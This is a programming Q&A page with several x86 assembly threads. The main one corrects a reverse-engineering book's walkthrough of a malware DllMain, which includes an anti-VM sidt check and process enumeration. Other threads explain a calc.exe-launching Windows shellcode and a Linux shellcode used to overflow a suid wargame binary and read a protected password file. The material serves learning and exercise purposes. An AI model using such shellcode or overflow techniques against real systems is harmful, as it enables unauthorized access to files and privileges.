Errata in "Practical Reverse Engineering"? - windows

I've just started the book Practical Reverse Engineering by Bruce Dang et alia, and am confused about a portion of the "walk-through" at the end of chapter one. This is the relevant portion of code:
65: ...
66: loc_10001d16:
67: mov eax, [ebp-118h]
68: mov ecx, [ebp-128h]
69: jmp short loc_10001d2a (line 73)
70: loc_10001d24:
71: mov eax, [ebp+0ch]
72: mov ecx, [ebp+0ch]
73: loc_10001d2a:
74: cmp eax, ecx
75: pop esi
76: jnz short loc_10001D38 (line 82)
77: xor eax, eax
78: pop edi
79: mov esp, ebp
80: pop ebp
81: retn 0ch
82: ...
And the authors' commentary:
"After the loop exits, execution resumes at line 66. Lines 67–68 save the matching PROCESSENTRY32’s th32ParentProcessID/th32ProcessID in EAX/ECX and
continue execution at 73. Notice that Line 66 is also a jump target in line 43.
Lines 70–74 read the fdwReason parameter of DllMain (EBP+C) and check
whether it is 0 (DLL_PROCESS_DETACH). If it is, the return value is set to 0 and
it returns; otherwise, it goes to line 82."
This is not how I interpreted the code when reading it; surely any jump to loc_10001d24 (line 70) will cause the function to terminate with return value 0 unconditionally, and not only if the value at ebp+0x0c is 0? (I assume that poping into esi does not affect the eflags register, and that the jump in line 76 conditions on the result of cmp eax, ecx in line 74?) This is also consistent with earlier portions in the code, which jump to loc_10001d24 if various called functions return with values indicating failure.
In addition, I thought the point of the section starting at line 66 was to also return with value 0 if PROCESSENTRY32 (a structure defined earlier, starting at position ebp-0x130 in memory) has equal th32ParentProcessID (ebp-0x118 in memory) and th32ProcessID (ebp-0x128 in memory) entries; is this correct? The authors' commentary did not seem to indicate this.
As a more general question, even just chapter 1 of the book has seemed to have had quite a large number of typos; does anyone know of a webpage collecting errata from the book anywhere?

Yes, ECX and EAX are both loaded from the same memory location, so unless something else has a pointer to it and is changing it asynchronously, cmp x,x / jne will always be not-taken. Unlike floating-point, ever possible integer is equal to itself.
And you're correct, pop doesn't change EFLAGS, as per Intel's manuals: https://www.felixcloutier.com/x86/pop.
To check whether a memory location is zero, you can load it into a reg for test eax,eax / jnz
or cmp dword ptr [ebp + 0xc], 0 / jne.
(JNE and JNZ are the same instruction; the different mnemonics let you express the semantic meanings of equality or directly being zero based on ZF being set according to the value itself.)
Lines 70–74 read the fdwReason parameter of DllMain (EBP+C) and check whether it is 0 (DLL_PROCESS_DETACH)
This is bogus. If the book is full of stuff like that, that doesn't sound like a good book.
The cmp eax,ecx only makes any sense when reached from the path that loaded 2 different values. (And couldn't use test for that, x & y != 0 doesn't tell you whether they were equal.) This seems unlikely to be real compiler output.

This is the full listing. It's part of malware found in the wild:
01: ; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
02: _DllMain#12 proc near
03: 55 push ebp
04: 8B EC mov ebp, esp
05: 81 EC 30 01 00+ sub esp, 130h
06: 57 push edi
07: 0F 01 4D F8 sidt fword ptr [ebp-8]
08: 8B 45 FA mov eax, [ebp-6]
09: 3D 00 F4 03 80 cmp eax, 8003F400h
10: 76 10 jbe short loc_10001C88 (line 18)
11: 3D 00 74 04 80 cmp eax, 80047400h
12: 73 09 jnb short loc_10001C88 (line 18)
13: 33 C0 xor eax, eax
14: 5F pop edi
15: 8B E5 mov esp, ebp
16: 5D pop ebp
17: C2 0C 00 retn 0Ch
18: loc_10001C88:
19: 33 C0 xor eax, eax
20: B9 49 00 00 00 mov ecx, 49h
21: 8D BD D4 FE FF+ lea edi, [ebp-12Ch]
22: C7 85 D0 FE FF+ mov dword ptr [ebp-130h], 0
23: 50 push eax
24: 6A 02 push 2
25: F3 AB rep stosd
26: E8 2D 2F 00 00 call CreateToolhelp32Snapshot
27: 8B F8 mov edi, eax
28: 83 FF FF cmp edi, 0FFFFFFFFh
29: 75 09 jnz short loc_10001CB9 (line 35)
30: 33 C0 xor eax, eax
31: 5F pop edi
32: 8B E5 mov esp, ebp
33: 5D pop ebp
34: C2 0C 00 retn 0Ch
35: loc_10001CB9:
36: 8D 85 D0 FE FF+ lea eax, [ebp-130h]
37: 56 push esi
38: 50 push eax
39: 57 push edi
40: C7 85 D0 FE FF+ mov dword ptr [ebp-130h], 128h
41: E8 FF 2E 00 00 call Process32First
42: 85 C0 test eax, eax
43: 74 4F jz short loc_10001D24 (line 70)
44: 8B 35 C0 50 00+ mov esi, ds:_stricmp
45: 8D 8D F4 FE FF+ lea ecx, [ebp-10Ch]
46: 68 50 7C 00 10 push 10007C50h
47: 51 push ecx
48: FF D6 call esi
49: 83 C4 08 add esp, 8
50: 85 C0 test eax, eax
51: 74 26 jz short loc_10001D16 (line 66)
52: loc_10001CF0:
53: 8D 95 D0 FE FF+ lea edx, [ebp-130h]
54: 52 push edx
55: 57 push edi
56: E8 CD 2E 00 00 call Process32Next
57: 85 C0 test eax, eax
58: 74 23 jz short loc_10001D24 (line 70)
59: 8D 85 F4 FE FF+ lea eax, [ebp-10Ch]
60: 68 50 7C 00 10 push 10007C50h
61: 50 push eax
62: FF D6 call esi
63: 83 C4 08 add esp, 8
64: 85 C0 test eax, eax
65: 75 DA jnz short loc_10001CF0 (line 52)
66: loc_10001D16:
67: 8B 85 E8 FE FF+ mov eax, [ebp-118h]
68: 8B 8D D8 FE FF+ mov ecx, [ebp-128h]
69: EB 06 jmp short loc_10001D2A (line 73)
70: loc_10001D24:
71: 8B 45 0C mov eax, [ebp+0Ch]
72: 8B 4D 0C mov ecx, [ebp+0Ch]
73: loc_10001D2A:
74: 3B C1 cmp eax, ecx
75: 5E pop esi
76: 75 09 jnz short loc_10001D38 (line 82)
77: 33 C0 xor eax, eax
78: 5F pop edi
79: 8B E5 mov esp, ebp
80: 5D pop ebp
81: C2 0C 00 retn 0Ch
82: loc_10001D38:
83: 8B 45 0C mov eax, [ebp+0Ch]
84: 48 dec eax
85: 75 15 jnz short loc_10001D53 (line 93)
86: 6A 00 push 0
87: 6A 00 push 0
88: 6A 00 push 0
89: 68 D0 32 00 10 push 100032D0h
90: 6A 00 push 0
91: 6A 00 push 0
92: FF 15 20 50 00+ call ds:CreateThread
93: loc_10001D53:
94: B8 01 00 00 00 mov eax, 1
95: 5F pop edi
96: 8B E5 mov esp, ebp
97: 5D pop ebp
98: C2 0C 00 retn 0Ch
99: _DllMain#12 endp
So lines 70-74 make no sense on their own, but do serve the original purpose - if either Process32First()/Process32Next() returns FALSE then the code jumps here and eventually exits with 0.
And if the desired process was found then eax/ecx are set to ParentProcessID/ProcessID respectively so the function will continue.
Anyway, there's also lines 83-85 which the books states:
...with lpStartAddress as 0x100032D0. This block can be decompiled as follows:
if (fdwReason == DLL_PROCESS_DETACH) { return FALSE; }
if (fdwReason == DLL_THREAD_ATTACH || fdwReason == DLL_THREAD_DETACH) { return TRUE; }
CreateThread(0, 0, (LPTHREAD_START_ROUTINE) 0x100032D0, 0, 0, 0);
return TRUE;
Lines 83-85 actually check if fdwReason equals DLL_PROCESS_ATTACH or not (bypassing the call to CreateThread if not, which makes perfect sense), and there's no special case for DLL_PROCESS_DETACH.
I'll say that the book certainly lacks proper structure, some things the book takes for granted, other maybe mundane things are emphasizes. Still a very good resource.
Oh well, who said this was easy.

Related

Why do I find some never called instructions nopl, nopw after ret or jmp in GCC compiled code? [duplicate]

I've been working with C for a short while and very recently started to get into ASM. When I compile a program:
int main(void)
{
int a = 0;
a += 1;
return 0;
}
The objdump disassembly has the code, but nops after the ret:
...
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: 83 ec 10 sub $0x10,%esp
804839a: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
80483a1: 83 45 fc 01 addl $0x1,-0x4(%ebp)
80483a5: b8 00 00 00 00 mov $0x0,%eax
80483aa: c9 leave
80483ab: c3 ret
80483ac: 90 nop
80483ad: 90 nop
80483ae: 90 nop
80483af: 90 nop
...
From what I learned nops do nothing, and since after ret wouldn't even be executed.
My question is: why bother? Couldn't ELF(linux-x86) work with a .text section(+main) of any size?
I'd appreciate any help, just trying to learn.
First of all, gcc doesn't always do this. The padding is controlled by -falign-functions, which is automatically turned on by -O2 and -O3:
-falign-functions
-falign-functions=n
Align the start of functions to the next power-of-two greater than n, skipping up to n bytes. For instance,
-falign-functions=32 aligns functions to the next 32-byte boundary, but -falign-functions=24 would align to the next 32-byte boundary only
if this can be done by skipping 23 bytes or less.
-fno-align-functions and -falign-functions=1 are equivalent and mean that functions will not be aligned.
Some assemblers only support this flag when n is a power of two; in
that case, it is rounded up.
If n is not specified or is zero, use a machine-dependent default.
Enabled at levels -O2, -O3.
There could be multiple reasons for doing this, but the main one on x86 is probably this:
Most processors fetch instructions in aligned 16-byte or 32-byte blocks. It can be
advantageous to align critical loop entries and subroutine entries by 16 in order to minimize
the number of 16-byte boundaries in the code. Alternatively, make sure that there is no 16-byte boundary in the first few instructions after a critical loop entry or subroutine entry.
(Quoted from "Optimizing subroutines in assembly
language" by Agner Fog.)
edit: Here is an example that demonstrates the padding:
// align.c
int f(void) { return 0; }
int g(void) { return 0; }
When compiled using gcc 4.4.5 with default settings, I get:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
000000000000000b <g>:
b: 55 push %rbp
c: 48 89 e5 mov %rsp,%rbp
f: b8 00 00 00 00 mov $0x0,%eax
14: c9 leaveq
15: c3 retq
Specifying -falign-functions gives:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
b: eb 03 jmp 10 <g>
d: 90 nop
e: 90 nop
f: 90 nop
0000000000000010 <g>:
10: 55 push %rbp
11: 48 89 e5 mov %rsp,%rbp
14: b8 00 00 00 00 mov $0x0,%eax
19: c9 leaveq
1a: c3 retq
This is done to align the next function by 8, 16 or 32-byte boundary.
From “Optimizing subroutines in assembly language” by A.Fog:
11.5 Alignment of code
Most microprocessors fetch code in aligned 16-byte or 32-byte blocks. If an importantsubroutine entry or jump label happens to be near the end of a 16-byte block then themicroprocessor will only get a few useful bytes of code when fetching that block of code. Itmay have to fetch the next 16 bytes too before it can decode the first instructions after thelabel. This can be avoided by aligning important subroutine entries and loop entries by 16.
[...]
Aligning a subroutine entry is as simple as putting as many
NOP
's as needed before thesubroutine entry to make the address divisible by 8, 16, 32 or 64, as desired.
As far as I remember, instructions are pipelined in cpu and different cpu blocks (loader, decoder and such) process subsequent instructions. When RET instructions is being executed, few next instructions are already loaded into cpu pipeline. It's a guess, but you can start digging here and if you find out (maybe the specific number of NOPs that are safe, share your findings please.

Can not understand how my shellcode works. Shellcode for windows OS( not Linux!) to open calc.exe

I’ve got a shellcode. It opens calculator in my buffer overflow program.
0: eb 16 jmp 0x18
2: 5b pop ebx
3: 31 c0 xor eax,eax
5: 50 push eax
6: 53 push ebx
7: bb 4d 11 86 7c mov ebx,0x7c86114d
c: ff d3 call ebx
e: 31 c0 xor eax,eax
10: 50 push eax
11: bb ea cd 81 7c mov ebx,0x7c81cdea
16: ff d3 call ebx
18: e8 e5 ff ff ff call 0x2
1d: 63 61 6c arpl WORD PTR [ecx+0x6c],sp
20: 63 2e arpl WORD PTR [esi],bp
22: 65 78 65 gs js 0x8a
25: 00 90 90 90 90 90 add BYTE PTR [eax-0x6f6f6f70],dl
2b: 90 nop
2c: 90 nop
2d: 90 nop
2e: 90 nop
2f: 90 nop
Apart from the main question being “What does this shellcode do line by line”, I am particularly interested in:
The jmp operation, why and where does my program jump?
The arpl stuff, I see it for the first time and google does not help me much... Same with GS operation
The jmp 0x18 is a relative jump to offset 0x18, which is practically the end of your code. It then calls address 0x2 (again, relative). This call places the "return address" on the stack, so it could be popped from it, giving you a clue about the address in which this relative shellcode is being executed. And indeed, the pop ebx at offset 0x2 is getting the address from the stack.
I said that 0x18 is the end of the code, because the lines after it are data bytes and not asm opcodes. This is why you see arpl. If you look at the hex values of the bytes, you will see:
calc.exe\0 ==> 0x63 0x61 0x63 0x6c 0x2e 0x65 0x78 0x65 0x00
Edited:
The full flow of the shellcode is:
jmp 0x18 - jump to to the last code instruction of the shellcode
call 0x2 - returns to offset 2, and stores the address of offset 0x1D on the stack
pop ebx - ebx := address from the stack, which is the address of the string "calc.exe"
xor eax,eax - common opcode to zero the register: eax := 0
push eax - push the value 0 as the second argument for a future function call
push ebx - push the pointer to "calc.exe" as the first argument for a future function call
mov ebx,0x7c86114d - ebx will be a fixed address (probably WinExec)
call ebx - call the function: WinExec("calc.exe", 0)
xor eax,eax - again, eax := 0
push eax - push the value 0 as the first argument for a future function call
mov ebx,0x7c81cdea - ebx will be a fixed address (probably exit)
call ebx - call the function: exit(0)

gcc likely() unlikely() macros and assembly code

I'm trying to see how gcc's likely() and unlikely() branch prediction macros has effect on assembly code. In the following piece of code I don't see any difference in the generated assembly code regardless of which macro i use. Any pointers on what's happening?
0 int main() {
1 volatile int x;
2 unlikely(x)?x++:x--;
3 }
Asm code:
0 0000000000000014 <main>:
1 int main() {
2 14: 55 push rbp
3 15: 48 89 e5 mov rbp,rsp
4 volatile int x;
5 likely(x)?x++:x--;
6 18: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
7 1b: 85 c0 test eax,eax
8 1d: 0f 95 c0 setne al
9 20: 0f b6 c0 movzx eax,al
10 23: 48 85 c0 test rax,rax
11 26: 74 0b je 33 <main+0x1f>
12 28: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
13 2b: 83 c0 01 add eax,0x1
14 2e: 89 45 fc mov DWORD PTR [rbp-0x4],eax
15 31: eb 09 jmp 3c <main+0x28>
16 33: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
17 36: 83 e8 01 sub eax,0x1
18 39: 89 45 fc mov DWORD PTR [rbp-0x4],eax
19 }
20 3c: 5d pop rbp
21 3d: c3 ret
It looks like you compiled without optimization. Basic block reordering is an optimization, so without it, __builtin_expect does not have this effect. With optimization, I observe that the sense of the branch is inverted when switching the expected result.
Note that whether this has any effect on current x86 processors is difficult to say.

Is tooling available to 'assemble' WebAssembly to x86-64 native code?

I am guessing that a Wasm binary is usually JIT-compiled to native code, but given a Wasm source, is there a tool to see the actual generated x86-64 machine code?
Or asked in a different way, is there a tool that consumes Wasm and outputs native code?
The online WasmExplorer compiles C code to both WebAssembly and FireFox x86, using the SpiderMonkey compiler. Given the following simple function:
int testFunction(int* input, int length) {
int sum = 0;
for (int i = 0; i < length; ++i) {
sum += input[i];
}
return sum;
}
Here is the x86 output:
wasm-function[0]:
sub rsp, 8 ; 0x000000 48 83 ec 08
cmp esi, 1 ; 0x000004 83 fe 01
jge 0x14 ; 0x000007 0f 8d 07 00 00 00
0x00000d:
xor eax, eax ; 0x00000d 33 c0
jmp 0x26 ; 0x00000f e9 12 00 00 00
0x000014:
xor eax, eax ; 0x000014 33 c0
0x000016: ; 0x000016 from: [0x000024]
mov ecx, dword ptr [r15 + rdi] ; 0x000016 41 8b 0c 3f
add eax, ecx ; 0x00001a 03 c1
add edi, 4 ; 0x00001c 83 c7 04
add esi, -1 ; 0x00001f 83 c6 ff
test esi, esi ; 0x000022 85 f6
jne 0x16 ; 0x000024 75 f0
0x000026:
nop ; 0x000026 66 90
add rsp, 8 ; 0x000028 48 83 c4 08
ret
You can view this example online.
WasmExplorer compiles code into wasm / x86 via a service - you can see the scripts that are run on Github - you should be able to use these to construct a command-line tool yourself.

PTRACE_TRACEME without parent

I'm trying for fun to exploit a code which uses ptrace to prevent debugging. This executable is suid, therefore there's no use in cracking it.
It have also the stack segment executable. This executable is made for playing. After I found my self a vulnerability in it, I tried buffer overflow it. I wrote a shellcode which launches a shell, and with my surprise it hangs. (BASH reports the process have been stopped) After some tests, I ended up to the conclusion that ptrace do not only prevents debugging, but it also prevents my shellcode to get executed.
Reading about ptrace, I found that a process which invokes ptrace(PTRACE_TRACEME,0,1,0) will be stoped as soon as it invokes the syscall exec. So I changed strategy, since ptrace will stop the process as soon as it launches an executable, I tried a shellcode which reads a file. My objective is not launch a shell, but instead read a file which my user have no permission. At last, this code also hanged.
Can anyone explain me why my code, in spite it contains no exec call, it gets hanged?
Is there any way to stop the ptrace from within the process itself?
In my case, ptraced process have no parent, and it is running with higher privileges, cause the suid, how can it be controlled?
Here my code which should not contains any exec.
Here my shell code:
0: 31 c0 xor eax,eax
2: 31 db xor ebx,ebx
4: 31 c9 xor ecx,ecx
6: 31 d2 xor edx,edx
8: eb 38 jmp 0x42
a: 5b pop ebx
b: c6 43 13 01 mov BYTE PTR [ebx+0x13],0x1
f: fe 4b 13 dec BYTE PTR [ebx+0x13]
12: b0 05 mov al,0x5
14: 31 c9 xor ecx,ecx
16: cd 80 int 0x80
18: 89 c6 mov esi,eax
1a: eb 06 jmp 0x22
1c: b0 01 mov al,0x1
1e: 31 db xor ebx,ebx
20: cd 80 int 0x80
22: 89 f3 mov ebx,esi
24: b0 03 mov al,0x3
26: 83 ec 01 sub esp,0x1
29: 89 e1 mov ecx,esp
2b: b2 01 mov dl,0x1
2d: cd 80 int 0x80
2f: 31 db xor ebx,ebx
31: 39 c3 cmp ebx,eax
33: 74 e7 je 0x1c
35: b0 04 mov al,0x4
37: b3 01 mov bl,0x1
39: b2 01 mov dl,0x1
3b: cd 80 int 0x80
3d: 83 c4 01 add esp,0x1
40: eb e0 jmp 0x22
42: e8 c3 ff ff ff call 0xa
47: db '/home/level8/passwd'
I believe you have a core misunderstanding of how ptrace works.
When the process stops after calling execve, that is a good thing. It means your debugger gets a chance to change things around, both before and after the execve.
It seems to me like you wrote ptrace(PTRACE_TRACEME) in the child, but you have not implemented any of the parent side support you should have. As a result, as soon as ptrace is trying to notify the debugger of an event, your process stops and never restarts.

Resources